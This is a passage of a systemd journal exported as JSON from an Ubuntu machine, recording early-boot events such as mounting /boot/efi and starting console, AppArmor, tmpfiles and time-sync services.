"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", 
"_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local File Systems (Pre).", "UNIT" : "local-fs-pre.target", "INVOCATION_ID" : "8775097a2b9d438eb78e2d0195363732", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780158334" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f0;b=e2b08827b5804427b422c10c84f1567e;m=5f3294;t=5bd16dd22b1fc;x=9bd3cb671a6f47b3", "__REALTIME_TIMESTAMP" : "1615280780521980", "__MONOTONIC_TIMESTAMP" : "6238868", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "CODE_FILE" : "../src/udev/net/ethtool-util.c", "CODE_LINE" : "547", "CODE_FUNC" : "ethtool_set_glinksettings", "SYSLOG_IDENTIFIER" : "systemd-udevd", "MESSAGE" : "link_config: autonegotiation is unset or enabled, the speed and duplex are not writable.", "_PID" : "409", "_COMM" : "systemd-udevd", "_EXE" : "/lib/systemd/systemd-udevd", "_CMDLINE" : "/lib/systemd/systemd-udevd", "_SYSTEMD_CGROUP" : "/system.slice/systemd-udevd.service", "_SYSTEMD_UNIT" : "systemd-udevd.service", "_SYSTEMD_INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780521851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f1;b=e2b08827b5804427b422c10c84f1567e;m=60e5fe;t=5bd16dd246565;x=70999a101e00351a", "__REALTIME_TIMESTAMP" : "1615280780633445", "__MONOTONIC_TIMESTAMP" : "6350334", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Found device /dev/ttyS0.", "UNIT" : "dev-ttyS0.device", "INVOCATION_ID" : "293ed7c0e80948c39b31c3279654da1d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780631229" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f2;b=e2b08827b5804427b422c10c84f1567e;m=621e23;t=5bd16dd259d8a;x=648886d4bbc9a161", "__REALTIME_TIMESTAMP" : "1615280780713354", "__MONOTONIC_TIMESTAMP" : "6430243", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch.", "UNIT" : "systemd-rfkill.socket", "INVOCATION_ID" : "3484c3c7a8ea4120a1c191923754f101", "_SOURCE_REALTIME_TIMESTAMP" : 
"1615280780709645" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f3;b=e2b08827b5804427b422c10c84f1567e;m=62289e;t=5bd16dd25a806;x=f8d08e8ec74b004e", "__REALTIME_TIMESTAMP" : "1615280780716038", "__MONOTONIC_TIMESTAMP" : "6432926", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "CODE_FILE" : "../src/udev/net/ethtool-util.c", "CODE_LINE" : "547", "CODE_FUNC" : "ethtool_set_glinksettings", "SYSLOG_IDENTIFIER" : "systemd-udevd", "MESSAGE" : "link_config: autonegotiation is unset or enabled, the speed and duplex are not writable.", "_COMM" : "systemd-udevd", "_EXE" : "/lib/systemd/systemd-udevd", "_CMDLINE" : "/lib/systemd/systemd-udevd", "_SYSTEMD_CGROUP" : "/system.slice/systemd-udevd.service", "_SYSTEMD_UNIT" : "systemd-udevd.service", "_SYSTEMD_INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "_PID" : "411", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780716029" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f4;b=e2b08827b5804427b422c10c84f1567e;m=67191c;t=5bd16dd2a9882;x=f359e2cba0ff9606", "__REALTIME_TIMESTAMP" : "1615280781039746", "__MONOTONIC_TIMESTAMP" : "6756636", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", 
"JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Found device /dev/disk/by-label/UEFI.", "UNIT" : "dev-disk-by-label-UEFI.device", "INVOCATION_ID" : "5c43576c87dc4326a86b3081ce645102", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781038616" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f5;b=e2b08827b5804427b422c10c84f1567e;m=67369d;t=5bd16dd2ab604;x=7e47c4b15c12240b", "__REALTIME_TIMESTAMP" : "1615280781047300", "__MONOTONIC_TIMESTAMP" : "6764189", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Mounting /boot/efi...", "UNIT" : "boot-efi.mount", "INVOCATION_ID" : "6a4e024c144a4cccb32d6a9dbf13382f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781046777" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f6;b=e2b08827b5804427b422c10c84f1567e;m=6803fa;t=5bd16dd2b8361;x=d5c232e837e738ae", "__REALTIME_TIMESTAMP" : "1615280781099873", "__MONOTONIC_TIMESTAMP" : "6816762", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : 
"3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "boot-efi.mount", "INVOCATION_ID" : "6a4e024c144a4cccb32d6a9dbf13382f", "MESSAGE" : "Mounted /boot/efi.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781095873" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f7;b=e2b08827b5804427b422c10c84f1567e;m=6804df;t=5bd16dd2b8446;x=37eb2db56a93c4b0", "__REALTIME_TIMESTAMP" : "1615280781100102", "__MONOTONIC_TIMESTAMP" : "6816991", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local File Systems.", "UNIT" : "local-fs.target", "INVOCATION_ID" : "1dacf109c01042b8b9e02d10371c1b1c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781098003" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f8;b=e2b08827b5804427b422c10c84f1567e;m=680a8c;t=5bd16dd2b89f3;x=4910c4745d1d7773", "__REALTIME_TIMESTAMP" : "1615280781101555", "__MONOTONIC_TIMESTAMP" : "6818444", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : 
"systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Create Volatile Files and Directories...", "UNIT" : "systemd-tmpfiles-setup.service", "INVOCATION_ID" : "5e70a567d5ea41bca036432fe845e916", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781101547" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f9;b=e2b08827b5804427b422c10c84f1567e;m=682f82;t=5bd16dd2baee9;x=b533bcff03066bd8", "__REALTIME_TIMESTAMP" : "1615280781111017", "__MONOTONIC_TIMESTAMP" : "6827906", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Tell Plymouth To Write Out Runtime Data...", "UNIT" : "plymouth-read-write.service", "INVOCATION_ID" : "bb9896e20e1245a5accc30ae97de9802", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781108890" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fa;b=e2b08827b5804427b422c10c84f1567e;m=684d79;t=5bd16dd2bcce0;x=39cd496056218fc", "__REALTIME_TIMESTAMP" : 
"1615280781118688", "__MONOTONIC_TIMESTAMP" : "6835577", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Set console font and keymap...", "UNIT" : "console-setup.service", "INVOCATION_ID" : "d076bfd203c341b0aa9ae47eee197dc7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781116825" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fb;b=e2b08827b5804427b422c10c84f1567e;m=686e85;t=5bd16dd2beded;x=c38475369e87d84a", "__REALTIME_TIMESTAMP" : "1615280781127149", "__MONOTONIC_TIMESTAMP" : "6844037", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting ebtables ruleset management...", "UNIT" : "ebtables.service", "INVOCATION_ID" : "ca659a18573443f4b7253369397d23c9", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280781125009" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fc;b=e2b08827b5804427b422c10c84f1567e;m=6887aa;t=5bd16dd2c0711;x=3a5b6560f5f3420d", "__REALTIME_TIMESTAMP" : "1615280781133585", "__MONOTONIC_TIMESTAMP" : "6850474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting AppArmor initialization...", "UNIT" : "apparmor.service", "INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781131338" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fd;b=e2b08827b5804427b422c10c84f1567e;m=68a7dd;t=5bd16dd2c2744;x=c4a43ea0df13bba7", "__REALTIME_TIMESTAMP" : "1615280781141828", "__MONOTONIC_TIMESTAMP" : "6858717", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", 
"_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Commit a transient machine-id on disk...", "UNIT" : "systemd-machine-id-commit.service", "INVOCATION_ID" : "a7cc3d2edc2d455f8262a9365ac0e1e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781139336" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fe;b=e2b08827b5804427b422c10c84f1567e;m=68e4be;t=5bd16dd2c6425;x=7b9454eaca1e6031", "__REALTIME_TIMESTAMP" : "1615280781157413", "__MONOTONIC_TIMESTAMP" : "6874302", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "console-setup.service", "INVOCATION_ID" : "d076bfd203c341b0aa9ae47eee197dc7", "MESSAGE" : "Started Set console font and keymap.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781154519" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ff;b=e2b08827b5804427b422c10c84f1567e;m=692751;t=5bd16dd2ca6b9;x=a0284d33fd2653c0", "__REALTIME_TIMESTAMP" : "1615280781174457", "__MONOTONIC_TIMESTAMP" : "6891345", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : 
"/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "plymouth-read-write.service", "INVOCATION_ID" : "bb9896e20e1245a5accc30ae97de9802", "MESSAGE" : "Started Tell Plymouth To Write Out Runtime Data.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781168846" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=200;b=e2b08827b5804427b422c10c84f1567e;m=693d51;t=5bd16dd2cbcb9;x=764810199645f137", "__REALTIME_TIMESTAMP" : "1615280781180089", "__MONOTONIC_TIMESTAMP" : "6896977", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-machine-id-commit.service", "INVOCATION_ID" : "a7cc3d2edc2d455f8262a9365ac0e1e2", "MESSAGE" : "Started Commit a transient machine-id on disk.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781177172" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=201;b=e2b08827b5804427b422c10c84f1567e;m=69599e;t=5bd16dd2cd905;x=c708d5829a4ceea3", "__REALTIME_TIMESTAMP" : "1615280781187333", "__MONOTONIC_TIMESTAMP" : "6904222", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-tmpfiles-setup.service", "INVOCATION_ID" : "5e70a567d5ea41bca036432fe845e916", "MESSAGE" : "Started Create Volatile Files and Directories.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781184338" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=202;b=e2b08827b5804427b422c10c84f1567e;m=6978e6;t=5bd16dd2cf84d;x=1302676ed9c7dd18", "__REALTIME_TIMESTAMP" : "1615280781195341", "__MONOTONIC_TIMESTAMP" : "6912230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Update UTMP about System Boot/Shutdown...", "UNIT" : "systemd-update-utmp.service", "INVOCATION_ID" : "4d1e0aa27016434c8dd74250bc4a0327", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781192809" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=203;b=e2b08827b5804427b422c10c84f1567e;m=699f7c;t=5bd16dd2d1ee3;x=c7aed6302cee302f", "__REALTIME_TIMESTAMP" : "1615280781205219", "__MONOTONIC_TIMESTAMP" : "6922108", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Network Time Synchronization...", "UNIT" : "systemd-timesyncd.service", "INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781203129" } { "__CURSOR" : 